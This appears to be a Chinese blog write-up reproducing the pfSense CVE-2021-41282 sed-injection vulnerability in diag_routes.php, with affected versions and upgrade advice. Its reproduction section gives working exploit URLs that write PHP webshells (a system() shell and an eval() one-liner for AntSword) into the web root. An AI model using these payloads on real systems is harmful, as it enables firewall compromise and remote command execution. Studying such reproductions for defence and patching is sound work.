Pfsense漏洞复现(CVE-2021-41282)
一、产品介绍:
pfSense® Plus 软件是世界上最值得信赖的防火墙。 该软件赢得了全球用户的尊重和喜爱——安装次数超过 300 万次。 开源技术使之成为可能。 由 Netgate 制成坚固、可靠、可靠的产品
产品官网:
https://www.pfsense.org/
二、漏洞概述:
pfSense 允许经过身份验证的用户获取有关防火墙中设置的路由的信息。 信息是通过执行 netstat实用程序,然后通过 sed调用执行。 虽然命令注入的常见预防模式(即使用 escapeshellarg参数的函数)正在使用中,但是仍然可以注入 sed- 特定代码并在任意位置写入任意文件。 由于易受攻击的端点也容易受到跨站点请求伪造 (CSRF) 的攻击,因此也可以利用此漏洞进行预身份验证。
三、漏洞详情:
CVE编号 |
CVE-2021-41282 |
漏洞类型 |
远程代码执行 |
威胁等级 |
高危 |
影响版本 |
pfSense CE version <= 2.5.2 pfSense Plush version < 22.01 |
四、漏洞复现:
复现环境:
下载地址: Tags · pfsense/pfsense · GitHub
Pfsense版本: 2.5.1
操作系统: FreeBSD Linux
漏洞位于diag_routes.php页面,在做filter参数接收时没有对输入的参数进行严格的过滤导致产生的命令执行
在对diag_routes.php发起一个请求时,如果没有IPV6的请求参数,初始执行的命令如下所示:
/usr/bin/netstat –Rw –f inet 这样,再次请求filter参数就会在后面拼接上命令,利用的payload如下所示:
/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+system($_GET[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/a.php%0a%23
漏洞利用的前提是需要进行登录,登录之后再次请求该链接就会在网站根路径下生成一个webshell的文件
我们再次访问该文件,发现已经生成成功了
使用参数即可执行命令
可以稍作修改,替换成一句话,使用蚁剑连接
/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+\@eval($_POST[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/shell.php%0a%23
所以最后生成的命令就是:
/usr/bin/netstat -rW -f inet | /usr/bin/sed -e '1,3d; 5,\$ { /!d;};s/Destination/\x3c\x3fphp system($_GET[\x22a\x22])\x3b\x3f\x3e/;w /usr/local/www/a.php #/!d; };'
参数讲解:
netstat –rW #获取路由并且不使用truncate跟踪
netstat –f inet #AF默认会使用inet(DARPA Internet),inet是支持的路由格式
sed –e ‘1,3d’; #筛选结果,将1,3行删除不显示,就是显示1,3行之外的所有内容
在sed当中可以使用s/match/replace和w/path/to/files来进行写入
s/Destination/\x3c\x3fphp system($_GET[\x22a\x22])\x3b\x3f\x3e/;w /usr/local/www/a.php
这一段内容就是将netstat结果中的Destination替换为<?php system($_GET[“a”]);?>,再写入到/usr/local/www/a.php文件当中
将前面的参数闭合使用#注释掉后面的/!d};进行执行
五、修复建议:
将 pfSense CE 升级到 2.6.0 版或将 pfSense Plus 升级到 22.01 版
Pfsense漏洞复现(CVE-2021-41282)相关推荐
- 【从零复现CVE漏洞】Tenda 路由器栈溢出复现(CVE-2018-18708)
1 漏洞概述 从搜索引擎中搜索一下CVE会有很多提供CVE索引的网站,我们简要的看一下这个CVE的描述. An issue was discovered on Tenda AC7 V15.03.06. ...
- CVE(2017-15715、2021-41773、2021-40438)漏洞复现
仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...
- CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)
文章目录 免责声明 前言 一.漏洞简介 风险等级评判 二.影响版本 office版本 三.漏洞复现 复现环境 工具 使用方法 利用 第一种 第二种 防范避免 结尾 参考 免责声明 本文章仅供学习和研究 ...
- CVE-2021-3560 Polkit权限提升漏洞复现与分析
0x00 简介 Polkit是Linux上的一个系统服务,其用于实现权限管理,通过给非特权进程授权,允许具有特权的进程(或者库文件lib)给非特权进程提供服务,由于Polkit被systemd使用,所 ...
- android 动画 最顶层_【Android编程实战】StrandHogg漏洞复现及原理分析_Android系统上的维京海盗...
0x00 StrandHogg漏洞详情 StrandHogg漏洞 CVE编号:暂无 [漏洞危害] 近日,Android平台上发现了一个高危漏洞 该漏洞允许攻击者冒充任意合法应用,诱导受害者授予恶意应用 ...
- java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...
学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...
- php打开网页执行即执行bat程序_CVE202011107:XAMPP任意命令执行漏洞复现
0x00简介 XAMPP是一个把Apache网页服务器与PHP.Perl及MariaDB集合在一起的安裝包,允许用戶可以在自己的电脑上轻易的建立网页服务器.该软件与phpstudy类似. 2020年4 ...
- CVE-2018-1273漏洞复现日志+IDS规则编写
CVE-2018-1273(Spring Data Commons) 远程命令执行漏洞 漏洞描述: Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本 ...
- CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议 本文仅为验证漏洞,在本地环境测试验证,无其它目的 漏洞编号: ...
最新文章
- linux postgresql .run包卸载,linux下删除自带的postgresql 及全新安装
- 杭电oj2072,2091字符串java实现
- [转] ubuntu 无线网络 配置 virtualbox
- smartform 与调用程序间内表数据传递方法
- C++拷贝构造函数的陷阱
- 用C++实现十进制转二进制【个人思想】
- 多媒体计算机接口卡,多媒体技术基础 2.2多媒体接口卡 多媒体接口卡.docx
- Swift - RunTime(动态性) 问题 浅析
- 一篇文章让你彻底了解Java内部类
- android 刷机时缺少驱动无法识别
- wxParse无法解析strong标签
- LMDB内存映射型数据库
- 如何获取Android手机连接当前网络的外网IP
- 如何获取视频文件的扩展名
- 英特尔核心显卡控制面板设置自定义分辨率
- 百度翻译API教程(完整Android代码)
- 《绝版游戏之信长之野望12—“统一日本的游戏“》
- 灵活搭建50方局域网视频会议基本系统
- 菜鸟的三遍读书法进阶
- PostgreSQL扫描方法综述
热门文章
- Jetson Agx Xavier 安装cuda10.2和cudnn,pytorch,pycharm, unet
- json语法和json解析
- Android绘制圆形图片的方法
- MATLAB AWGN
- 普铁也全面实施电子客票啦
- 点估计及矩估计的一些理解
- HDFS Corrupt blocks 解决方法
- Linux hp 无法自动补全,在Deepin 20下出现HP-DeskJet-2600-series打印机无法打印的解决...
- 思林水电厂1000T桥机改造项目顺利验收
- TreeMap用法总结